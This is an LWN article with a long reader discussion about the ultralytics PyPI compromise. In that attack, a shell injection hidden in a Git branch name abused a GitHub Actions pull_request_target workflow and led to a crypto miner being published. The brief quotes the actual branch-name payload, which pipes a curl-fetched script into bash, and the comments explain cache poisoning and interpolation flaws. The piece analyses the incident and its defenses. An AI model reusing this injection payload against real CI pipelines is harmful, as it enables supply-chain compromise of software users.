Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.github user content.com/ultra lytics/ ultra lytics/ 12e4f5 4ca3 f2e6 9bcdc 900d 1c6e 16642 ca8ae 545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
Posted Dec 6, 2024 19:04 UTC (Fri)
by quotemstr (subscriber, #45331)
[Link] (14 responses)
I come down *hard* for limiting identifiers to the smallest possible character set, especially in non-user-facing contexts. Programming identifiers should be printable ASCII characters with no whitespace. KISS.
Posted Dec 6, 2024 19:58 UTC (Fri)
by epa (subscriber, #39769)
[Link]
Even then you should be stricter with the first character since strings beginning - can still cause mischief in shell command lines or some languages such as Tcl.
Posted Dec 7, 2024 1:52 UTC (Sat)
by geofft (subscriber, #59789)
[Link] (2 responses)
I would agree it doesn't make sense to allow things like dollar signs in usernames. I do think there's merit in considering permitting alphanumeric characters from other alphabets (accented Latin letters, Arabic, Devanagari, Hiragana, etc.)—but not their punctuation or whitespace, either. (Of course even this proposal deserves some careful consideration.)
Posted Dec 7, 2024 14:54 UTC (Sat)
by quotemstr (subscriber, #45331)
[Link] (1 responses)
Banning literal terminal control codes in usernames would merely be a good start
Posted Dec 8, 2024 3:51 UTC (Sun)
by geofft (subscriber, #59789)
[Link]
Posted Dec 7, 2024 15:26 UTC (Sat)
by mathstuf (subscriber, #69389)
[Link] (9 responses)
- protected branches
I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.
Posted Dec 7, 2024 16:39 UTC (Sat)
by excors (subscriber, #95769)
[Link] (8 responses)
According to https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-... (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)
As detailed in https://adnanthekhan.com/2024/05/06/the-monsters-in-your-... , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target which is triggered by a pull request but executes in the project's main branch (unlike pull_request which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.
That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.
The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (https://docs.github.com/en/actions/writing-workflows/choo...).
It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.
Posted Dec 7, 2024 21:05 UTC (Sat)
by mathstuf (subscriber, #69389)
[Link] (7 responses)
> (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)
Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.
> it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.
Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.
Posted Dec 8, 2024 4:17 UTC (Sun)
by geofft (subscriber, #59789)
[Link] (1 responses)
pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.
I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.
(Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain since they're writing an interpreted language, but Rust is a compiler itself and needs at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know off hand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)
Posted Dec 8, 2024 7:35 UTC (Sun)
by mathstuf (subscriber, #69389)
[Link]
> If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.
Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.
Posted Dec 8, 2024 10:25 UTC (Sun)
by excors (subscriber, #95769)
[Link] (4 responses)
This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.
(The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (https://pip.pypa.io/en/stable/topics/secure-installs/). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)
Posted Dec 8, 2024 14:02 UTC (Sun)
by mathstuf (subscriber, #69389)
[Link]
Posted Dec 8, 2024 22:51 UTC (Sun)
by meejah (subscriber, #162580)
[Link]
That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.
I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).
Posted Dec 8, 2024 23:31 UTC (Sun)
by randomguy3 (subscriber, #71063)
[Link] (1 responses)
I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!
Posted Dec 8, 2024 23:33 UTC (Sun)
by randomguy3 (subscriber, #71063)
[Link]
Posted Dec 6, 2024 19:16 UTC (Fri)
by raven667 (subscriber, #5198)
[Link] (21 responses)
Maybe tracing each code path which can result in fork() back to the beginning and putting a flag around each source that can turn it off/on so someone can create an allow list of what kinds of invocations they are willing to allow in their automation. People will probably hate it as much as SELinux if they have to enable things when their existing scripts break, but we'd have to make a collective decision as to what we value more, between system integrity and the work to actually enumerate all that should be allowed.
Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.
Whatever we do, allowing data across a security boundary into an interactive command interpreter is a bad and dangerous thing to do, and we should make it easier to _not_ do that, which seems to be an impossible bar right now.
Posted Dec 6, 2024 19:51 UTC (Fri)
by excors (subscriber, #95769)
[Link] (7 responses)
GitHub Actions workflows are defined in YAML files, where you can use syntax like ${{github.ref}} in values. Those will be expanded by the action runner when it executes the workflow. (https://docs.github.com/en/actions/writing-workflows/choo...)
One of the values in the YAML file is a shell script to execute. If you use ${{github.ref}} in there, the attacker-provided branch name will be inserted before the script is passed to the shell. The attacker doesn't even need to use $(...) in the branch name, they can simply use "; to exit from the current shell command and start a new one, and the shell sees a totally normal sequence of basic commands. (See PoC in https://github.com/advisories/GHSA-7x29-qqmq-v6qc , which is a different but similar vulnerability in exactly the same project a few months ago.)
I think the specific vulnerability here is fixed in https://github.com/ultralytics/actions/commit/89c1f380073... by moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm (although actually the branch name was removed entirely; presumably they didn't need it at all).
GitHub warns about this problem at https://docs.github.com/en/actions/security-for-github-ac...
Posted Dec 6, 2024 20:37 UTC (Fri)
by wahern (subscriber, #37304)
[Link] (2 responses)
Posted Dec 6, 2024 21:14 UTC (Fri)
by jwarnica (subscriber, #27492)
[Link]
Posted Dec 7, 2024 11:02 UTC (Sat)
by epa (subscriber, #39769)
[Link]
But even without any attacker, constraining inputs is still good practice, I feel. It saves you time debugging later when a stray space character got into a value and (even though you were not mixing data and code) no longer compared equal to the value without a leading space. Something like a git branch name (or a username) is not the place to allow the full flowering of human creativity with special characters. There are plenty of commit message and comment fields for that.
Posted Dec 7, 2024 5:59 UTC (Sat)
by raven667 (subscriber, #5198)
[Link] (2 responses)
What if multiple commands on a single line using `;` was also a flagged feature and not enabled by default or able to be disabled? I'm not smart enough to figure out a whole system on my own but I keep thinking we should find something as effective as SQL bind variables are in stopping unexpected command interpretation that can be applied to shell scripting, maybe the wholesale separation of the shell implementation used for interactive CLIs and for scripting and automation, to make the little bits of automation that are sprinkled _everywhere_ safer.
Posted Dec 7, 2024 10:02 UTC (Sat)
by NYKevin (subscriber, #129325)
[Link] (1 responses)
* Interactive use by a human.
Everything else is an antipattern, where the shell has been co-opted to replace a missing feature in another program (often using the shell's -c flag).
Posted Dec 7, 2024 20:15 UTC (Sat)
by raven667 (subscriber, #5198)
[Link]
I'm just frustrated at seeing this same kind of problem again
Posted Dec 7, 2024 10:57 UTC (Sat)
by fishface60 (subscriber, #88700)
[Link]
I see this bug everywhere, these yaml templating engines should require a schema define how to escape interpolated values (e.g. like ninja shell escapes everything in a command context) or that part of your data format doesn't support interpolation.
Posted Dec 6, 2024 20:16 UTC (Fri)
by Wol (subscriber, #4433)
[Link]
The Pr1mos shell (early 80s) had something exactly like this. I don't remember the details, but v18 had a Command Processor Language (CPL) with all sorts of globbing. That then became part of the shell proper with v19. And I do remember something about switches where you could tell the shell to glob or not glob, and stuff like that. It's too long ago, but I do miss that power - so much of the past has been lost ...
Cheers,
Posted Dec 6, 2024 21:10 UTC (Fri)
by rweikusat2 (subscriber, #117920)
[Link] (6 responses)
At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.
Posted Dec 6, 2024 21:15 UTC (Fri)
by pizza (subscriber, #46)
[Link] (5 responses)
But... it has an OpenSSF best practices badge, therefore it's safe and secure!
Posted Dec 6, 2024 21:47 UTC (Fri)
by david.a.wheeler (subscriber, #72896)
[Link] (4 responses)
I know you're being sarcastic, but I thought I should respond.
I'm technical lead of the OpenSSF Best Practices badge work. We know better than to claim *that*! If you look at the front page <https://www.bestpractices.dev> it says:
>> Consumers of the badge can quickly assess which FLOSS projects are following best practices and as a result are more likely to produce higher-quality secure software.
Unless you're making formal proofs of the code, "more likely" is all any list of criteria can hope to do. Thinking is *still* required. Thinking will be required next year, too :-).
Posted Dec 7, 2024 10:03 UTC (Sat)
by ma4ris8 (subscriber, #170509)
[Link] (3 responses)
Posted Dec 7, 2024 15:36 UTC (Sat)
by smcv (subscriber, #53363)
[Link]
Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.
Posted Dec 7, 2024 23:21 UTC (Sat)
by jengelh (guest, #33263)
[Link] (1 responses)
while read x y z; do foo "$x" | bar "$y" | baz "$z"; done <file
Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terse-ness.
Posted Dec 9, 2024 10:44 UTC (Mon)
by taladar (subscriber, #68407)
[Link]
Posted Dec 6, 2024 23:34 UTC (Fri)
by ballombe (subscriber, #9523)
[Link] (3 responses)
Posted Dec 7, 2024 6:08 UTC (Sat)
by raven667 (subscriber, #5198)
[Link] (2 responses)
Posted Dec 9, 2024 10:46 UTC (Mon)
by taladar (subscriber, #68407)
[Link] (1 responses)
The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.
Posted Dec 9, 2024 11:15 UTC (Mon)
by farnz (subscriber, #17727)
[Link]
The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data.
And note that this is a natural pattern in languages with strict type systems; you have parsers that takes input and turns it into internal structures, then you do your work on the internal structures, and you convert again from internal to external structures as you interact with other programs.
Posted Dec 7, 2024 16:35 UTC (Sat)
by eru (subscriber, #2753)
[Link]
Posted Dec 6, 2024 20:32 UTC (Fri)
by Bigos (subscriber, #96807)
[Link] (2 responses)
Maybe break the branch name so that it is over several lines?
Posted Dec 6, 2024 20:45 UTC (Fri)
by daroc (editor, #160859)
[Link] (1 responses)
Posted Dec 6, 2024 21:03 UTC (Fri)
by daroc (editor, #160859)
[Link]
Posted Dec 6, 2024 22:16 UTC (Fri)
by nickodell (subscriber, #125165)
[Link]
https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...
Posted Dec 7, 2024 10:41 UTC (Sat)
by rudis (subscriber, #130572)
[Link]
Posted Dec 7, 2024 20:26 UTC (Sat)
by ewen (subscriber, #4772)
[Link]
https://github.com/ultralytics/ultralytics/issues/18027#i...
And the current theory is those were uploaded directly to PyPI, presumably using stolen credentials (eg a PAT — personal access token), since there doesn’t seem to be a matching GitHub CI run.
See also the summary from the repo owner:
https://github.com/ultralytics/ultralytics/pull/18018#iss...
But also note some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write up linked by others earlier):
https://github.com/ultralytics/ultralytics/issues/18027#i...
So it appears there’ll need to be more cleanup from the attacker having got in via string interpolation issues :-/ And meanwhile a bunch of packages depending on the impacted package have locked the version to the last release before the malware infected versions and/or suggested their users check for and remove the affected versions.
I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).
Ewen
Posted Dec 8, 2024 12:48 UTC (Sun)
by cbcbcb (subscriber, #10350)
[Link] (16 responses)
It would be rather inconvenient to rename “/home“ as “/home$(touch /tmp/security_bug)“, but I bet you'd still find a lot of broken filename handling if you did
Posted Dec 8, 2024 13:14 UTC (Sun)
by mb (subscriber, #50428)
[Link] (1 responses)
Posted Dec 8, 2024 13:33 UTC (Sun)
by cbcbcb (subscriber, #10350)
[Link]
Posted Dec 8, 2024 19:52 UTC (Sun)
by eru (subscriber, #2753)
[Link]
Posted Dec 9, 2024 6:09 UTC (Mon)
by lkundrak (subscriber, #43452)
[Link] (8 responses)
Posted Dec 9, 2024 8:00 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (4 responses)
Posted Dec 9, 2024 9:06 UTC (Mon)
by zdzichu (subscriber, #17118)
[Link] (2 responses)
Posted Dec 9, 2024 18:33 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utils typically work fine, but anything with the shell scripts just cracks.
Posted Dec 11, 2024 16:59 UTC (Wed)
by jezuch (subscriber, #52988)
[Link]
Oh the irony!
Posted Dec 9, 2024 10:26 UTC (Mon)
by leromarinvit (subscriber, #56850)
[Link]
Posted Dec 9, 2024 10:24 UTC (Mon)
by excors (subscriber, #95769)
[Link] (2 responses)
Posted Dec 9, 2024 16:54 UTC (Mon)
by raven667 (subscriber, #5198)
[Link] (1 responses)
Posted Dec 12, 2024 9:47 UTC (Thu)
by mgedmin (subscriber, #34497)
[Link]
GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.
Posted Dec 9, 2024 21:47 UTC (Mon)
by bearstech (subscriber, #160755)
[Link] (3 responses)
Posted Dec 10, 2024 8:12 UTC (Tue)
by Wol (subscriber, #4433)
[Link] (2 responses)
The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...
Cheers,
Posted Dec 10, 2024 11:22 UTC (Tue)
by taladar (subscriber, #68407)
[Link] (1 responses)
Posted Dec 10, 2024 12:40 UTC (Tue)
by Wol (subscriber, #4433)
[Link]
So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...
Cheers,
Posted Dec 10, 2024 1:19 UTC (Tue)
by jthill (subscriber, #56558)
[Link] (2 responses)
Posted Dec 10, 2024 7:54 UTC (Tue)
by excors (subscriber, #95769)
[Link] (1 responses)
(check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)
Posted Dec 10, 2024 9:24 UTC (Tue)
by jthill (subscriber, #56558)
[Link]
Unless I'm still blindspotting,
Usernames
Usernames
Usernames
Usernames
Usernames
Usernames
- jobs with a specific "environment" tag attached to them
Usernames
Usernames
Cache poisoning in CI
Cache poisoning in CI
Usernames
Usernames
Usernames
Usernames
Usernames
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
* Scripting of things that would otherwise be done interactively by a human (as a timesaving measure for human sysadmins, not as something you programmatically invoke in production).
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
Wol
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
How to fix the whole catagory of shell injection
Bash Replacement - Rust Scripts
but making non-trivial secure Bash scripts is difficult.
Are Rust scripts promoted as an alternative?
Bash Replacement - Rust Scripts
Bash Replacement - Rust Scripts
Bash Replacement - Rust Scripts
How to fix the whole category of shell injection
How to fix the whole category of shell injection
How to fix the whole category of shell injection
Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format.
How to fix the whole category of shell injection
How to fix the whole catagory of shell injection
LWN "also impacted"
LWN "also impacted"
LWN "also impacted"
Linting GitHub workflows for escalation-of-privilege vulnerabilities
"Some surprising code execution sources in bash"
Additional malware versions released
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Microsoft had a good idea
Wol
Microsoft had a good idea
Microsoft had a good idea
Wol
The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.
branchname='<that mess>'
git check-ref-format refs/heads/"$branchname" || die no that does not look good
The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.
I see you're correct. Yow. That's painful. I've probably made this mistake myself then.
The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.
$branchname expanded, quoted or not, still won't be expanded again unless rescanned, like the expansion being passed to bash -c or something instead of the var being passed in the environment for the invoked bash to expand just the once itself.
